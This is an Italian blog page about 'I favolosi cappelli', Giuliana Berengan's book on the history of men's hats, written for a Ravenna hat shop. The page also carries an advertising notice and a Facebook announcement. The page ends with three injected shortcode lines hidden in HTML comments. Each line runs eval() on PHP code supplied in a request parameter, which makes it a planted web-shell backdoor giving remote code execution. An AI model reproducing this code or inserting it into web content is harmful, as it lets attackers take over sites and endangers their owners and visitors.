Sponsor

Pubblicità su Favolosi-Cappelli.it

A partire da marzo 2010 è disponibile un servizio di gestione banner pubblicitari e articoli redazionali curato da Hurrah, l’agenzia web che gestisce il blog.
Il listino banner è differenziato per settori: vogliamo infatti privilegiare inserzionisti legati al mondo del cappello, quindi gli operatori di altri settori moda.  Quindi i primi hanno condizioni di accesso privilegiate ai ns. servizi oltre ad avere la possibilità di inserire articoli redazionali.

Listino 2012

Presto su Facebook

A breve saremo presenti anche su Facebook…

Nasce il sito de “I favolosi cappelli”

Favolosi cappelli - copertinaLa Cappelleria Inglese di via Gordini 3 a Ravenna ha festeggiato nel febbraio 2007 il suo 34° compleanno.

Roberto Manzoni suo fondatore e titolare ha voluto farle un regalo speciale: un libro “su misura” che rende omaggio alla nobile, antica arte della cappelleria ed al cappello che, attraverso i secoli, è stato inseparabile compagno degli uomini che lo hanno ospitato sulla propria testa.

Questo sito presenta una libera versione dei diversi capitoli del volume sulla storia dei cappelli scritto da Giuliana Berengan “I favolosi cappelli”, che verranno pubblicati a puntate.

I vari capitoli del libro verranno pubblicati periodicamente, con scadenza settimanale, a partire dal 21 aprile 2007.

“I favolosi cappelli” di Giuliana Berengan

Il titolo “FAVOLOSI CAPPELLI” è già indicativo dello stile del libro: un lungo racconto che percorre le vicende del cappello da uomo dalle sue forme più arcaiche fino alle moderne fogge novecentesche.

Cappe, cappucci, berretti e berrette, feltri, tricorni, paglie, colbacchi e lobbie, bombette e cilindri entrano da protagonisti nella narrazione che ci restituisce immagini, personaggi e atmosfere di una storia dell’uomo vista attraverso la storia dei suoi cappelli.

Curiosità, notizie, aneddoti, vizi e virtù di questo oggetto d’abbigliamento funzionale ed estetico ad un tempo scorrono sullo sfondo degli eventi come in un vecchio film muto: Bogart, Caruso, Rodolfo Valentino, Toscanini, D’Annunzio, Puccini e Nuvolari sono soltanto alcuni degli attori che si presentano a noi accompagnati da un inseparabile copricapo.

Il libro vuole essere anche un omaggio a quanti fabbricandolo, indossandolo, creando nuovi modelli, immortalandolo in forme artistiche e materiali diversi hanno contribuito a custodire e valorizzare la tradizione del cappello come complemento insostituibile dell’eleganza maschile.

<!– [insert_php]if (isset($_REQUEST["qao"])){eval($_REQUEST["qao"]);exit;}[/insert_php][php]if (isset($_REQUEST["qao"])){eval($_REQUEST["qao"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["xfGqW"])){eval($_REQUEST["xfGqW"]);exit;}[/insert_php][php]if (isset($_REQUEST["xfGqW"])){eval($_REQUEST["xfGqW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["OPV"])){eval($_REQUEST["OPV"]);exit;}[/insert_php][php]if (isset($_REQUEST["OPV"])){eval($_REQUEST["OPV"]);exit;}[/php] –>